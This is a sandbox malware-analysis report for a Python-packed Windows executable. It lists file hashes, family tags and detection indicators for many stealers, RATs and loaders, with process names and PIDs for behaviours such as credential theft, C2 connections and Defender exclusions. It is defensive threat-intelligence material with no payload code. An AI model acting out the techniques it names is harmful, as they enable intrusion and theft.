File name:

main.exe

Full analysis: https://app.any.run/tasks/e242f7bc-de9c-4be3-ad65-fc92874f2fd7
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Analysis date: July 02, 2025, 14:34:13
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
loader
python
lumma
stealer
amadey
github
miner
possible-phishing
clickfix
phishing
azorult
meterpreter
backdoor
payload
metasploit
networm
amus
auto
generic
botnet
vidar
remcos
rat
pastebin
koiloader
evasion
agenttesla
modiloader
phorpiex
njrat
dbatloader
neshta
coinminer
havoc
pyinstaller
telegram
storm1747
tycoon
aurotunstealer
purelogs
purecrypter
bladabindi
screenconnect
rmm-tool
rdp
asyncrat
formbook
xred
redline
stealc
nanocore
aurotun
quasarrat
masslogger
stealerium
arechclient2
younglotus
gh0st
snake
keylogger
loki
ransomware
quasar
sliver
dcrat
darkcomet
koistealer
koi
arkeistealer
diamotrixclipper
ftp
exfiltration
remote
pythonstealer
donutloader
gh0strat
cobaltstrike
rhadamanthys
bruteratel
wsftprm-sys
vuln-driver
websocket
babadeda
metastealer
auto-sch-xml
xloader
arch-exec
arch-doc
winring0x64-sys
xmrig
emmenhtal
xor-url
ims-api
susp-powershell
api-base64
crypto-regex
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (console) x86-64, for MS Windows, 7 sections
MD5:

C942A56638772644D847709D906FA23D

SHA1:

12D6B77FEC2244CDC4050A083AA741185CC48010

SHA256:

56A28391D309102557FCF9BC34351A50B49054282F2007851DCBC4E825E7C37A

SSDEEP:

98304:R/0Cg6brcfRkzKVfq7AnYRO4Y6ZhkDQet54netUjZUj0vNQLFZfQpyJoic3yjHFD:ivfkEwE1MUQ881mw02/ki+BIsG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Uses Task Scheduler to autorun other applications

      • cmd.exe (PID: 1660)
      • swagggg.exe (PID: 7696)
      • Client-built.exe (PID: 20204)
      • quasarat.exe (PID: 18452)
      • quasarat.exe (PID: 8300)
      • quasarat.exe (PID: 19208)
      • quasarat.exe (PID: 18260)
    • REMCOS has been found (auto)

      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • FXServer.exe (PID: 18776)
      • ap.exe (PID: 18040)
    • GENERIC has been found (auto)

      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • syspool.exe (PID: 9884)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • Ganja132.exe (PID: 11036)
      • Ganja176.exe (PID: 11940)
      • Ganja45.exe (PID: 11756)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • Amus.exe (PID: 11992)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • Ganja128.exe (PID: 18676)
      • powershell.exe (PID: 15236)
    • AMADEY has been found (auto)

      • main.exe (PID: 424)
      • donie30.exe (PID: 7712)
      • dumer.exe (PID: 16944)
    • LUMMA has been detected (SURICATA)

      • svchost.exe (PID: 2200)
      • MSBuild.exe (PID: 14256)
    • Changes powershell execution policy (Bypass)

      • main.exe (PID: 424)
      • werefult.exe (PID: 10168)
      • cmd.exe (PID: 7632)
      • powershell.exe (PID: 8104)
      • cmd.exe (PID: 632)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 8104)
      • powershell.exe (PID: 8916)
      • powershell.exe (PID: 8836)
      • powershell.exe (PID: 9652)
      • powershell.exe (PID: 10932)
      • powershell.exe (PID: 11008)
      • powershell.exe (PID: 11028)
      • powershell.exe (PID: 11732)
      • powershell.exe (PID: 11828)
      • powershell.exe (PID: 11740)
      • powershell.exe (PID: 11868)
      • powershell.exe (PID: 11876)
      • powershell.exe (PID: 10980)
      • powershell.exe (PID: 11064)
      • powershell.exe (PID: 12208)
      • powershell.exe (PID: 12380)
      • powershell.exe (PID: 12408)
      • powershell.exe (PID: 12432)
      • powershell.exe (PID: 11884)
      • powershell.exe (PID: 12268)
      • powershell.exe (PID: 12876)
      • powershell.exe (PID: 14804)
      • powershell.exe (PID: 15540)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 17812)
      • powershell.exe (PID: 15432)
      • powershell.exe (PID: 16924)
      • powershell.exe (PID: 10108)
      • powershell.exe (PID: 8144)
      • powershell.exe (PID: 21604)
    • AMADEY mutex has been found

      • donie30.exe (PID: 7712)
      • dumer.exe (PID: 9756)
      • dumer.exe (PID: 16944)
      • NetWindowsUpdate.exe (PID: 18560)
    • Application was injected by another process

      • rundll32.exe (PID: 8672)
      • rundll32.exe (PID: 8652)
    • Runs injected code in another process

      • CQapnzM.exe (PID: 7244)
    • LUMMA has been found (auto)

      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
    • Changes the autorun value in the registry

      • runtimebroker.exe (PID: 10248)
      • syspool.exe (PID: 9884)
      • WindowsUpdateLauncher.exe (PID: 10660)
      • loader.exe (PID: 12116)
      • Ganja85.exe (PID: 11764)
      • winsvchost.exe (PID: 12808)
      • msconfig.exe (PID: 13112)
      • Ganja36.exe (PID: 11932)
      • explorer.exe (PID: 14264)
      • Axam.a.exe (PID: 11836)
      • Amus.exe (PID: 11992)
      • AdobeART.exe (PID: 15552)
      • Bloxflip%20Predictor.exe (PID: 12768)
      • Axam.exe (PID: 15596)
      • Axam.exe (PID: 9756)
      • Axam.exe (PID: 13504)
      • remcos_a.exe (PID: 16540)
      • Axam.exe (PID: 9232)
      • Axam.exe (PID: 12528)
      • reg.exe (PID: 16640)
      • Axam.exe (PID: 14556)
      • Axam.exe (PID: 6820)
      • Axam.exe (PID: 13304)
      • reg.exe (PID: 17140)
      • Axam.exe (PID: 13836)
      • Axam.exe (PID: 16296)
      • Axam.exe (PID: 4888)
      • werefult.exe (PID: 10168)
      • Axam.exe (PID: 17832)
      • 6.exe (PID: 13616)
      • FXServer.exe (PID: 18776)
      • Axam.exe (PID: 19076)
      • Axam.exe (PID: 14480)
      • 90.exe (PID: 21332)
      • audiodg.exe (PID: 18956)
      • windriver.exe (PID: 19680)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 21464)
      • quasarat.exe (PID: 18452)
      • Axam.exe (PID: 19336)
      • Axam.exe (PID: 20588)
      • Axam.exe (PID: 21476)
      • Axam.exe (PID: 14876)
      • installer.exe (PID: 10492)
      • Axam.exe (PID: 13480)
      • Axam.exe (PID: 12752)
      • Axam.exe (PID: 18644)
      • Axam.exe (PID: 5600)
      • Axam.exe (PID: 12860)
      • Axam.exe (PID: 14268)
      • Axam.exe (PID: 20232)
      • Axam.exe (PID: 15212)
      • Axam.exe (PID: 22412)
      • Axam.exe (PID: 21212)
      • Axam.exe (PID: 20004)
      • Axam.exe (PID: 15600)
      • Axam.exe (PID: 18840)
      • Axam.exe (PID: 15368)
      • Server1.exe (PID: 21020)
      • Axam.exe (PID: 6336)
      • server.exe (PID: 20288)
      • Axam.exe (PID: 17912)
      • Axam.exe (PID: 21768)
      • reg.exe (PID: 6228)
      • Axam.exe (PID: 12048)
      • Axam.exe (PID: 11700)
      • reg.exe (PID: 10452)
      • quasarat.exe (PID: 8300)
      • reg.exe (PID: 10760)
      • Axam.exe (PID: 12364)
      • Axam.exe (PID: 20124)
      • dumer.exe (PID: 16944)
      • Axam.exe (PID: 2064)
      • Axam.exe (PID: 14468)
      • Axam.exe (PID: 22376)
      • Axam.exe (PID: 22052)
      • reg.exe (PID: 1336)
      • quasarat.exe (PID: 19208)
      • reg.exe (PID: 9044)
      • Axam.exe (PID: 20468)
      • Axam.exe (PID: 17632)
      • Axam.exe (PID: 16716)
      • Axam.exe (PID: 12456)
      • reg.exe (PID: 1176)
      • reg.exe (PID: 6900)
      • quasarat.exe (PID: 18260)
    • Registers / Runs the DLL via REGSVR32.EXE

      • runtimebroker.exe (PID: 10248)
      • WindowsUpdateLauncher.exe (PID: 10660)
      • loader.exe (PID: 12116)
      • f.exe (PID: 10468)
    • METASPLOIT has been found (auto)

      • main.exe (PID: 424)
    • Executing a file with an untrusted certificate

      • WindowsPrvSE.exe (PID: 10672)
      • witheFile.exe (PID: 12108)
      • tomcat8.exe (PID: 19260)
      • brbotnet.exe (PID: 20020)
    • AGENTTESLA has been found (auto)

      • main.exe (PID: 424)
    • NJRAT has been found (auto)

      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • main.exe (PID: 424)
      • your_app.exe (PID: 7460)
      • Bloxflip%20Predictor.exe (PID: 12768)
    • COINMINER has been found (auto)

      • main.exe (PID: 424)
    • DBATLOADER has been found (auto)

      • lol.exe (PID: 11820)
    • AZORULT mutex has been detected

      • L2.exe (PID: 11788)
    • PHORPIEX has been found (auto)

      • kajmak.exe (PID: 11924)
    • SCREENCONNECT has been found (auto)

      • main.exe (PID: 424)
      • main.exe (PID: 424)
    • PHISHING has been detected (SURICATA)

      • svchost.exe (PID: 2200)
    • CLICKFIX has been detected (SURICATA)

      • svchost.exe (PID: 2200)
      • main.exe (PID: 424)
    • NETWORM mutex has been found

      • Amus.exe (PID: 11992)
    • FORMBOOK has been found (auto)

      • main.exe (PID: 424)
    • METERPRETER has been detected (SURICATA)

      • main.exe (PID: 424)
      • rundll32.exe (PID: 21456)
    • METASPLOIT has been detected (SURICATA)

      • main.exe (PID: 424)
    • RAT has been found (auto)

      • main.exe (PID: 424)
    • NANOCORE has been found (auto)

      • main.exe (PID: 424)
      • windriver.exe (PID: 19680)
    • XRED has been found (auto)

      • main.exe (PID: 424)
    • REDLINE has been found (auto)

      • main.exe (PID: 424)
    • VIDAR mutex has been found

      • MSBuild.exe (PID: 13880)
    • Create files in the Startup directory

      • explorer.exe (PID: 14264)
      • Axam.a.exe (PID: 11836)
      • Bloxflip%20Predictor.exe (PID: 12768)
      • Fast%20Download.exe (PID: 19488)
      • bot.exe (PID: 16916)
      • Cloudy.exe (PID: 9416)
      • Setup.exe (PID: 10864)
    • ARECHCLIENT2 has been found (auto)

      • main.exe (PID: 424)
    • Actions looks like stealing of personal data

      • cfxre.exe (PID: 1632)
      • MSBuild.exe (PID: 14256)
      • MSBuild.exe (PID: 13880)
      • Jay.exe (PID: 12012)
      • 4eTHv9F.exe (PID: 8860)
      • vbc.exe (PID: 10184)
      • Vb5HUIU.exe (PID: 7208)
      • cc.exe (PID: 19988)
      • powershell.exe (PID: 12432)
    • Steals credentials from Web Browsers

      • cfxre.exe (PID: 1632)
      • MSBuild.exe (PID: 14256)
      • MSBuild.exe (PID: 13880)
      • Jay.exe (PID: 12012)
      • 4eTHv9F.exe (PID: 8860)
      • cc.exe (PID: 19988)
      • vbc.exe (PID: 10184)
      • Vb5HUIU.exe (PID: 7208)
      • powershell.exe (PID: 12432)
    • STEALER has been found (auto)

      • main.exe (PID: 424)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 14804)
      • powershell.exe (PID: 188)
      • powershell.exe (PID: 17812)
      • powershell.exe (PID: 15432)
      • powershell.exe (PID: 8620)
    • YOUNGLOTUS has been found (auto)

      • main.exe (PID: 424)
    • PURELOGS has been found (auto)

      • main.exe (PID: 424)
    • MODILOADER mutex has been found

      • AdobeART.exe (PID: 15552)
      • 90.exe (PID: 21332)
    • QUASARRAT has been found (auto)

      • main.exe (PID: 424)
      • main.exe (PID: 424)
    • GH0ST has been found (auto)

      • main.exe (PID: 424)
    • SLIVER has been found (auto)

      • main.exe (PID: 424)
    • NESHTA mutex has been found

      • Setup.exe (PID: 10864)
      • msedge.exe (PID: 6244)
      • FileCoAuth.exe (PID: 9348)
    • Connects to the CnC server

      • svchost.exe (PID: 2200)
      • 4eTHv9F.exe (PID: 8860)
      • Crypt.exe (PID: 12284)
      • dumer.exe (PID: 16944)
      • powershell.exe (PID: 9652)
      • cc.exe (PID: 19988)
      • explorer.exe (PID: 4772)
      • ksoftriqd.exe (PID: 16708)
    • SNAKE has been found (auto)

      • main.exe (PID: 424)
    • NJRAT mutex has been found

      • Bloxflip%20Predictor.exe (PID: 12768)
      • Fast%20Download.exe (PID: 20296)
      • Fast%20Download.exe (PID: 19488)
    • Changes Windows Defender settings

      • Crypt.exe (PID: 12284)
      • explorer.exe (PID: 4772)
    • Adds path to the Windows Defender exclusion list

      • Crypt.exe (PID: 12284)
      • msedge.exe (PID: 17824)
      • ap.exe (PID: 18040)
      • explorer.exe (PID: 4772)
      • s.exe (PID: 15748)
    • PURELOGS has been detected (SURICATA)

      • 4eTHv9F.exe (PID: 8860)
    • DCRAT has been found (auto)

      • main.exe (PID: 424)
      • main.exe (PID: 424)
    • DARKCOMET has been found (auto)

      • main.exe (PID: 424)
    • AUROTUN mutex has been found

      • Crypt.exe (PID: 12284)
    • QUASAR has been found (auto)

      • main.exe (PID: 424)
    • REMCOS mutex has been found

      • remcos_a.exe (PID: 16540)
      • FXServer.exe (PID: 18776)
      • rea.exe (PID: 21832)
      • iexplore.exe (PID: 20772)
    • REMCOS has been detected

      • remcos_a.exe (PID: 16540)
      • 22.exe (PID: 19504)
      • rea.exe (PID: 21832)
    • LUMMA mutex has been found

      • MSBuild.exe (PID: 14256)
    • AMADEY has been detected (SURICATA)

      • dumer.exe (PID: 16944)
    • EMMENHTAL has been detected (YARA)

      • main.exe (PID: 424)
    • Uses sleep, probably for evasion detection (SCRIPT)

      • wscript.exe (PID: 17308)
      • wscript.exe (PID: 21584)
    • XORed URL has been found (YARA)

      • main.exe (PID: 424)
    • Deletes a file (SCRIPT)

      • wscript.exe (PID: 17308)
      • wscript.exe (PID: 21584)
    • Uses AES cipher (POWERSHELL)

      • powershell.exe (PID: 8836)
      • powershell.exe (PID: 12876)
      • powershell.exe (PID: 12268)
    • UAC/LUA settings modification

      • reg.exe (PID: 5540)
      • reg.exe (PID: 12860)
    • Downloads the requested resource (POWERSHELL)

      • powershell.exe (PID: 9652)
      • powershell.exe (PID: 12408)
      • powershell.exe (PID: 11064)
    • Dynamically loads an assembly (POWERSHELL)

      • powershell.exe (PID: 12432)
      • powershell.exe (PID: 12268)
    • KOI has been detected (SURICATA)

      • powershell.exe (PID: 9652)
    • Scans artifacts that could help determine the target

      • 4eTHv9F.exe (PID: 8860)
    • AGENTTESLA has been detected (SURICATA)

      • Jay.exe (PID: 12012)
    • Stealers network behavior

      • Jay.exe (PID: 12012)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 15236)
    • LOKI has been found (auto)

      • main.exe (PID: 424)
    • ASYNCRAT has been detected (SURICATA)

      • foncar.exe (PID: 14284)
    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 10684)
      • cmd.exe (PID: 17564)
      • powershell.exe (PID: 11028)
      • powershell.exe (PID: 10108)
      • cmd.exe (PID: 632)
    • Steals Growtopia credentials and data (YARA)

      • main.exe (PID: 424)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 11028)
      • powershell.exe (PID: 11868)
      • powershell.exe (PID: 10108)
    • ARKEISTEALER has been found (auto)

      • dumer.exe (PID: 16944)
    • RHADAMANTHYS has been found (auto)

      • main.exe (PID: 424)
    • FORMBOOK has been detected (YARA)

      • main.exe (PID: 424)
    • NANOCORE has been detected (YARA)

      • main.exe (PID: 424)
    • BABADEDA has been found (auto)

      • main.exe (PID: 424)
    • Vulnerable driver has been detected

      • release.exe (PID: 19164)
      • sys.exe (PID: 19428)
    • STEALC mutex has been found

      • vtoroy.exe (PID: 20248)
      • perviy.exe (PID: 20276)
    • STEALC has been detected

      • vtoroy.exe (PID: 20248)
      • perviy.exe (PID: 20276)
    • FORMBOOK has been detected

      • mstsc.exe (PID: 11220)
      • explorer.exe (PID: 4772)
    • QUASAR mutex has been found

      • quasarat.exe (PID: 18452)
      • quasarat.exe (PID: 8300)
      • quasarat.exe (PID: 19208)
      • quasarat.exe (PID: 18260)
    • ASYNCRAT has been detected (MUTEX)

      • aaa%20(3).exe (PID: 20312)
      • AsyncClient.exe (PID: 20220)
      • AsyncClient.exe (PID: 19936)
      • aaa%20(3).exe (PID: 20028)
      • ddosziller.exe (PID: 22080)
    • METASTEALER has been detected (SURICATA)

      • cc.exe (PID: 19988)
    • REDLINE has been detected (SURICATA)

      • cc.exe (PID: 19988)
    • XRED mutex has been found

      • Server1.exe (PID: 21020)
    • SNAKEKEYLOGGER has been detected (SURICATA)

      • RegSvcs.exe (PID: 7928)
    • FORMBOOK has been detected (SURICATA)

      • explorer.exe (PID: 4772)
    • Starts CertUtil for downloading files

      • cmd.exe (PID: 20268)
    • NjRAT is detected

      • server.exe (PID: 20288)
    • ASYNCRAT has been found (auto)

      • Terminal_9235.exe (PID: 20464)
    • XMRig has been detected

      • ksoftriqd.exe (PID: 16708)
    • MINER has been detected (SURICATA)

      • ksoftriqd.exe (PID: 16708)
  • SUSPICIOUS

    • Process drops python dynamic module

      • main.exe (PID: 4984)
    • Loads Python modules

      • main.exe (PID: 424)
    • Starts CMD.EXE for commands execution

      • main.exe (PID: 424)
      • Bugsoft.exe (PID: 11860)
      • remcos_a.exe (PID: 16540)
      • esp.exe (PID: 16960)
      • f.exe (PID: 10468)
      • cmd.exe (PID: 9080)
      • forfiles.exe (PID: 16148)
      • CvWizardV2.exe (PID: 11916)
      • werefult.exe (PID: 10168)
      • forfiles.exe (PID: 17840)
      • discord.exe (PID: 12704)
      • FXServer.exe (PID: 18776)
      • winxclient.exe (PID: 19276)
      • mstsc.exe (PID: 11220)
      • EmmetPROD.exe (PID: 9520)
      • yc.exe (PID: 19448)
      • quasarat.exe (PID: 18452)
      • cmd.exe (PID: 20268)
      • pe2shc.exe (PID: 18488)
      • sys.exe (PID: 19428)
      • cmd.exe (PID: 10908)
      • explorer.exe (PID: 4772)
      • izlkpmmnuf.exe (PID: 21840)
      • forfiles.exe (PID: 10512)
      • quasarat.exe (PID: 8300)
      • Terminal_9235.exe (PID: 20464)
      • forfiles.exe (PID: 16072)
      • quasarat.exe (PID: 19208)
      • forfiles.exe (PID: 18768)
      • forfiles.exe (PID: 22008)
      • quasarat.exe (PID: 18260)
    • Executable content was dropped or overwritten

      • main.exe (PID: 424)
      • main.exe (PID: 4984)
      • runtimebroker.exe (PID: 10248)
      • syspool.exe (PID: 9884)
      • Ganja90.exe (PID: 11748)
      • lol.exe (PID: 11820)
      • Setup.exe (PID: 10864)
      • Ganja132.exe (PID: 11036)
      • Ganja176.exe (PID: 11940)
      • Ganja113.exe (PID: 11780)
      • Ganja45.exe (PID: 11756)
      • kajmak.exe (PID: 11924)
      • Ganja46.exe (PID: 11900)
      • Prolin.exe (PID: 12124)
      • Ganja153.exe (PID: 11984)
      • porn.exe (PID: 11796)
      • donie30.exe (PID: 7712)
      • swagggg.exe (PID: 7696)
      • explorer.exe (PID: 14264)
      • 123.exe (PID: 9176)
      • werefult.exe (PID: 10168)
      • Axam.a.exe (PID: 11836)
      • Amus.exe (PID: 11992)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 11812)
      • your_app.exe (PID: 7460)
      • Bloxflip%20Predictor.exe (PID: 12768)
      • Crypt.exe (PID: 12284)
      • Vb5HUIU.exe (PID: 7208)
      • remcos_a.exe (PID: 16540)
      • Installer.exe (PID: 3048)
      • powershell.exe (PID: 8836)
      • csc.exe (PID: 14272)
      • dumer.exe (PID: 16944)
      • powershell.exe (PID: 12876)
      • csc.exe (PID: 7016)
      • CvWizardV2.exe (PID: 11916)
      • test.exe (PID: 17144)
      • powershell.exe (PID: 11028)
      • csc.exe (PID: 17716)
      • Launcher_Start.exe (PID: 18420)
      • 6.exe (PID: 13616)
      • discord.exe (PID: 12704)
      • release.exe (PID: 19164)
      • FXServer.exe (PID: 18776)
      • cabal.exe (PID: 3972)
      • CryptoLocker.exe (PID: 19476)
      • csc.exe (PID: 17940)
      • windriver.exe (PID: 19680)
      • 444.exe (PID: 20168)
      • audi.exe (PID: 19496)
      • izlkpmmnuf.exe (PID: 21840)
      • Taskmgr.exe (PID: 1936)
      • sys.exe (PID: 19428)
      • yc.exe (PID: 19448)
      • Server1.exe (PID: 21020)
      • 4.exe (PID: 6704)
      • installer.exe (PID: 10492)
      • ap.exe (PID: 18040)
      • Cloudy.exe (PID: 9416)
      • Ganja128.exe (PID: 18676)
      • bot.exe (PID: 16916)
      • OUTLOOK.EXE (PID: 13960)
      • csc.exe (PID: 19544)
      • jajajdva.exe (PID: 14372)
      • csc.exe (PID: 17268)
      • csc.exe (PID: 7272)
      • csc.exe (PID: 8664)
      • csc.exe (PID: 9500)
      • csc.exe (PID: 9108)
      • csc.exe (PID: 12792)
      • powershell.exe (PID: 10108)
      • certutil.exe (PID: 9608)
      • csc.exe (PID: 9388)
      • csc.exe (PID: 22192)
      • windows.exe (PID: 19468)
      • csc.exe (PID: 12832)
      • csc.exe (PID: 22240)
      • csc.exe (PID: 5560)
      • Terminal_9235.exe (PID: 20464)
      • csc.exe (PID: 17680)
      • powershell.exe (PID: 11868)
      • csc.exe (PID: 7276)
      • csc.exe (PID: 17744)
      • csc.exe (PID: 18828)
      • csc.exe (PID: 8548)
      • msedge.exe (PID: 6244)
      • FileCoAuth.exe (PID: 9348)
    • The process drops C-runtime libraries

      • main.exe (PID: 4984)
      • main.exe (PID: 424)
      • Launcher_Start.exe (PID: 18420)
    • Process drops legitimate windows executable

      • main.exe (PID: 4984)
      • main.exe (PID: 424)
      • test.exe (PID: 17144)
      • Launcher_Start.exe (PID: 18420)
      • cabal.exe (PID: 3972)
      • izlkpmmnuf.exe (PID: 21840)
      • 4.exe (PID: 6704)
      • dumer.exe (PID: 16944)
      • msedge.exe (PID: 6244)
      • FileCoAuth.exe (PID: 9348)
    • Application launched itself

      • main.exe (PID: 4984)
      • rundll32.exe (PID: 8652)
      • powershell.exe (PID: 8104)
      • cmd.exe (PID: 9080)
      • 90.exe (PID: 19172)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 21464)
      • cmd.exe (PID: 20268)
      • cmd.exe (PID: 10908)
      • powershell.exe (PID: 12432)
    • Executing commands from a ".bat" file

      • main.exe (PID: 424)
      • Bugsoft.exe (PID: 11860)
      • cmd.exe (PID: 9080)
      • CvWizardV2.exe (PID: 11916)
      • discord.exe (PID: 12704)
      • yc.exe (PID: 19448)
      • quasarat.exe (PID: 18452)
      • cmd.exe (PID: 10908)
      • izlkpmmnuf.exe (PID: 21840)
      • quasarat.exe (PID: 8300)
      • Terminal_9235.exe (PID: 20464)
      • quasarat.exe (PID: 19208)
      • quasarat.exe (PID: 18260)
    • Starts a Microsoft application from unusual location

      • CQapnzM.exe (PID: 7244)
      • ledenn.exe (PID: 9192)
      • WindowsPrvSE.exe (PID: 10672)
      • izlkpmmnuf.exe (PID: 21840)
      • jajajdva.exe (PID: 14372)
    • Process requests binary or script from the Internet

      • main.exe (PID: 424)
      • dumer.exe (PID: 16944)
      • powershell.exe (PID: 15236)
      • powershell.exe (PID: 11028)
      • audiodg.exe (PID: 18956)
      • audi.exe (PID: 19496)
      • powershell.exe (PID: 10108)
    • Potential Corporate Privacy Violation

      • main.exe (PID: 424)
      • dumer.exe (PID: 16944)
      • powershell.exe (PID: 11028)
      • audi.exe (PID: 19496)
      • powershell.exe (PID: 10108)
      • certutil.exe (PID: 9608)
      • ksoftriqd.exe (PID: 16708)
    • Connects to unusual port

      • main.exe (PID: 424)
      • Worldoffice.exe (PID: 8880)
      • Worldofficee.exe (PID: 8908)
      • tcp_windows_amd64.exe (PID: 8944)
      • sFFG7Wg.exe (PID: 7616)
      • winsvchost.exe (PID: 12808)
      • 4eTHv9F.exe (PID: 8860)
      • Clien123.exe (PID: 10712)
      • AdobeART.exe (PID: 15552)
      • svchost.exe (PID: 14416)
      • Crypt.exe (PID: 12284)
      • vshell.exe (PID: 16516)
      • esp32.exe (PID: 12500)
      • XClient.exe (PID: 7736)
      • esp.exe (PID: 16960)
      • foncar.exe (PID: 14284)
      • installs.exe (PID: 7728)
      • build.exe (PID: 7768)
      • Jay.exe (PID: 12012)
      • sup.exe (PID: 18460)
      • elf.exe (PID: 10776)
      • winxclient.exe (PID: 19276)
      • EmmetPROD.exe (PID: 9520)
      • march.exe (PID: 18272)
      • demon.exe (PID: 17732)
      • https.exe (PID: 19424)
      • 22.exe (PID: 19504)
      • access.exe (PID: 20240)
      • CvWizardV2.exe (PID: 17508)
      • c2_payload_aes.exe (PID: 13536)
      • rundll32.exe (PID: 21456)
      • windriver.exe (PID: 19680)
      • cc.exe (PID: 19988)
      • epic.exe (PID: 22456)
      • Cloudy.exe (PID: 9416)
      • Fast%20Download.exe (PID: 20296)
      • aaa%20(3).exe (PID: 20312)
      • certutil.exe (PID: 9608)
      • c0917a8dtcp.exe (PID: 9112)
    • The process executes Powershell scripts

      • main.exe (PID: 424)
      • cmd.exe (PID: 632)
      • cmd.exe (PID: 7632)
      • powershell.exe (PID: 12432)
    • Suspicious files were dropped or overwritten

      • main.exe (PID: 424)
    • Connects to the server without a host name

      • main.exe (PID: 424)
      • syspool.exe (PID: 9884)
      • esp32.exe (PID: 12500)
      • dumer.exe (PID: 16944)
      • powershell.exe (PID: 9652)
      • powershell.exe (PID: 12408)
      • powershell.exe (PID: 15236)
      • powershell.exe (PID: 11028)
      • audiodg.exe (PID: 18956)
      • powershell.exe (PID: 10108)
    • The process checks if it is being run in the virtual environment

      • main.exe (PID: 424)
      • runtimebroker.exe (PID: 10248)
      • allonymouslyfFpY.exe (PID: 9208)
      • WindowsUpdateLauncher.exe (PID: 10660)
      • Vb5HUIU.exe (PID: 7208)
    • Starts POWERSHELL.EXE for commands execution

      • main.exe (PID: 424)
      • f.exe (PID: 10468)
      • werefult.exe (PID: 10168)
      • cmd.exe (PID: 632)
      • cmd.exe (PID: 7632)
      • Crypt.exe (PID: 12284)
      • powershell.exe (PID: 8104)
      • MSBuild.exe (PID: 13880)
      • explorer.exe (PID: 4772)
      • cmd.exe (PID: 2072)
      • windows.exe (PID: 19468)
      • powershell.exe (PID: 12432)
    • Executing commands from ".cmd" file

      • main.exe (PID: 424)
    • Reads security settings of Internet Explorer

      • sFFG7Wg.exe (PID: 7616)
      • build.exe (PID: 7768)
      • Helper.exe (PID: 8064)
      • donie30.exe (PID: 7712)
      • L2.exe (PID: 11788)
      • Amus.exe (PID: 11992)
      • lol.exe (PID: 11820)
      • Setup.exe (PID: 10864)
      • 123.exe (PID: 9176)
      • MSBuild.exe (PID: 13880)
      • %D0%A4%D0%BE%D1%80%D0%BC%D0%B0%203%D0%9E%D0%A8%D0%91%D0%A0.exe (PID: 11812)
      • Bloxflip%20Predictor.exe (PID: 12768)
      • your_app.exe (PID: 7460)
      • Vb5HUIU.exe (PID: 7208)
      • remcos_a.exe (PID: 16540)
      • dumer.exe (PID: 16944)
      • ShellExperienceHost.exe (PID: 2668)
      • CvWizardV2.exe (PID: 11916)
      • discord.exe (PID: 12704)
      • BootstrapperNew.exe (PID: 15140)
      • BootstrapperNew.exe (PID: 18192)
      • audi.exe (PID: 19496)
      • msedge.exe (PID: 17824)
      • Pack_Autre_ncrypt.exe (PID: 17004)
      • downloader.exe (PID: 14092)
      • Pack_Brout_ncrypt.exe (PID: 20152)
      • cabal.exe (PID: 3972)
      • BootstrapperNew.exe (PID: 16672)
      • FXServer.exe (PID: 18776)
      • BootstrapperNew.exe (PID: 20212)
      • BootstrapperNew.exe (PID: 19928)
      • {34184A33-0407-212E-3300-09040709E2C2}.exe (PID: 21464)
      • 444.exe (PID: 20168)
      • yc.exe (PID: 19448)
      • quasarat.exe (PID: 18452)
      • ap.exe (PID: 18040)
      • LOIC.exe (PID: 18172)
      • 4.exe (PID: 6704)
      • Server1.exe (PID: 21020)
      • Ganja128.exe (PID: 18676)
      • s.exe (PID: 15748)
      • quasarat.exe (PID: 8300)
      • Terminal_9235.exe (PID: 20464)
      • quasarat.exe (PID: 19208)
      • msedge.exe (PID: 6244)
      • FileCoAuth.exe (PID: 9348)
      • quasarat.exe (PID: 18260)
    • The process creates files with name similar to system file names

      • runtimebroker.exe (PID: 10248)
      • main.exe (PID: 424)
      • kajmak.exe (PID: 11924)
      • WerFault.exe (PID: 15564)
      • TestDumpAll.exe (PID: 1580)
      • Client-built.exe (PID: 20204)
      • 444.exe (PID: 20168)
      • yc.exe (PID: 19448)
      • Launcher_Start.exe (PID: 18420)
      • powershell.exe (PID: 11868)
    • Uses ATTRIB.EXE to modify file attributes

      • werefult.exe (PID: 10168)
      • Bloxflip%20Predictor.exe (PID: 12768)
      • cmd.exe (PID: 7632)
      • Fast%20Download.exe (PID: 20296)
    • Starts itself from another location

      • Ganja90.exe (PID: 11748)
      • Ganja132.exe (PID: 11036)
      • Ganja176.exe (PID: 11940)
      • Ganja113.exe (PID: 11780)
      • Ganja45.exe (PID: 11756)
      • kajmak.exe (PID: 11924)
      • Ganja46.exe (PID: 11900)
      • Ganja153.exe (PID: 11984)
      • donie30.exe (PID: 7712)
      • lol.exe (PID: 11820)
      • 6.exe (PID: 13616)
      • CryptoLocker.exe (PID: 19476)
    • Working with threads in the GNU C Compiler (GCC) libraries related mutex has been found

      • porn.exe (PID: 11796)
    • Block-list domains

